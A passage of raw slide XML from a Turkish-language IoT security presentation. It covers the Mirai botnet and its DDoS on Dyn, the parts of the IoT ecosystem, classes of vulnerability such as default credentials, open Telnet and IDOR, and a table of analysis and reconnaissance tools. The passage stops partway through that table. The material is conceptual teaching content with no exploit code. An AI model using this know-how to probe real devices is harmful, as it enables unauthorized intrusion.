                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Bu cihazların çoğu varsayılan kullanıcı adı ve şifre (örnek: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin:admin</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) ile korunuyordu.</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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Mirai, internette bu cihazları tarayıp zayıf oturum açma bilgilerini kullanarak onları ele geçirdi.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ele geçirilen cihazlar daha sonra, saldırganlar tarafından yönetilen merkezi sunuculara bağlandı.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1456625" y="1779900"/>
            <a:ext cx="7435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Fiziksel cihazların internete bağlanarak </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>veri toplaması</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>iletişim kurması</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ve gerektiğinde </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>otomatik işlem yapması </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sürecidir.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5002925" y="2191025"/>
            <a:ext cx="3789300" cy="2039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1000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🎯 Hedef Neydi?</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="10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Mirai ile oluşturulan devasa botnet ağı, hedef sistemlere </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>yüksek bant genişliği tüketen DDoS saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> düzenledi. </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="10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Bu saldırılar sonucunda:</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Dyn DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> adlı alan adı hizmet sağlayıcısı hedef alındı.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Dyn hizmet veremeyince, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Twitter, Netflix, Reddit, GitHub, Spotify</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> gibi birçok popüler servis </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>saatlerce erişilemez</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> hale geldi.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p2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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638075" y="462375"/>
            <a:ext cx="6092400" cy="1936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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🔍 2. IoT Ekosisteminin Bileşenleri</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="17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Cihaz (sensor, aktivatör)</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Firmware &amp; işletim sistemleri (RTOS, Linux tabanlı)</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Mobil Uygulama *</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Bulut servisi / API katmanı *</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Ağa bağlı ağ geçitleri (gateways)</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1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Not:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Her bileşen ayrı bir saldırı vektörü oluşturur.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p2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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332900" y="443875"/>
            <a:ext cx="6527100" cy="2561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0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🛡️ 3. IoT Güvenlik Zafiyet Türleri</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120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İletişim Güvenliği:</a:t>
            </a:r>
            <a:endParaRPr b="1"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TLS eksikliği, açık portlar, MQTT zafiyetleri</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Kimlik Doğrulama / Yetkilendirme:</a:t>
            </a:r>
            <a:endParaRPr b="1"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JWT (Json Web Token) reuse *, token sızıntısı *, hardcoded credentials</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Firmware Seviyesi Zafiyetler:</a:t>
            </a:r>
            <a:endParaRPr b="1"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Telnet açık, OTA update koruması yok, debug arayüzler</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Uygulama Seviyesi:</a:t>
            </a:r>
            <a:endParaRPr b="1"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Mobile App reverse engineering → API key extraction</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API &amp; Cloud:</a:t>
            </a:r>
            <a:endParaRPr b="1"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Improper access control (CWE-284) vb., IDOR, exposed S3 buckets</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p2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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="169" name="Google Shape;169;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="661000" y="485325"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{16439883-8009-4310-B882-0444342ABA4B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2011625"/>
                <a:gridCol w="2911525"/>
              </a:tblGrid>
              <a:tr h="370225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike"/>
                        <a:t>Araç</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike"/>
                        <a:t>Amacı</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike"/>
                        <a:t>IoT Inspector</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" u="none" cap="none" strike="noStrike"/>
                        <a:t>Cihaz davranışı analiz</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike"/>
                        <a:t>Binwalk</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" u="none" cap="none" strike="noStrike"/>
                        <a:t>Firmware unpacking</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike"/>
                        <a:t>Shodan/Censys</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" u="none" cap="none" strike="noStrike"/>
                        <a:t>Cihaz keşfi ve fingerprint</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike"/>
                        <a:t>Firmwalker</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" u="none" cap="none" strike="noStrike"/>
                        <a:t>Embedded Linux analiz</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike"/>
                        <a:t>MobSF, Frida</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
